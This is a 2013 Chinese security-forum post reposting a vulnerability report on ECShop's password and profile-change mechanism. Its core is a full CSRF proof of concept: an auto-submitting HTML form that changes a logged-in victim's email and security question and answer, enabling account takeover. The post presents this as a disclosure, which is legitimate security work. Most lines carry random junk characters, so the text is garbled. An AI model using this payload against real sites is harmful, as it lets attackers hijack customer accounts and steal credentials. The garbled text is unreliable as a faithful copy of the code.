找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2507|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
! r$ G9 `9 r+ V/ e! Qecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现, P% Z5 C1 c) {

  P9 d* h* J0 G; L% q0 k( wDemo For:http://www.wooyun.org/bug.php?action=view&id=3954 t: _! G* [7 M* c' v- z% R
% B/ ?% l$ }0 H1 s- M
详细说明:2 `$ @* E" ]1 }8 ^* q, i3 ~
利用csrf和xss可以突破官方所说的“障碍”6 p& |' I6 Z2 G' P) }' t9 m
xss版本已经有人说明
& @9 @  ?- D( l这里给出csrf版本
/ m. C/ x7 a2 [+ }( f% G; O& r0 E+ Q$ }* F
漏洞证明:
: \( X1 P* W& S<html>
+ I# b' c7 T+ w8 U& @<body>
2 g, v6 B9 S2 [<form action="http://www.wooyun.org/ecshop/user.php" method="POST"># j( A) J3 t/ r1 p1 f( P
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">8 @" _2 T/ O$ S# n; h7 |* d- q5 J
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 x& @1 Y! r  z1 p# q<INPUT TYPE="text" NAME="sel_question" value="ecshop">, L) H4 z5 z* H8 p
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">1 z8 [& v3 [4 q* B
</body>
! ]& A6 D2 _# i2 M9 A& B6 X! P<script>9 d/ x# u8 O: \+ Y8 O
document.forms[0].submit();/ U! b2 j, a3 }- L# I0 n: {, M" I2 w
</script>3 Y6 B: b1 D7 t9 X! S+ B
</html>" Z* n9 H0 C0 W8 q0 H7 s
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失2 R( M% w) N, \* r+ F6 l4 i! q; C

+ ^5 \* g- Q' M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表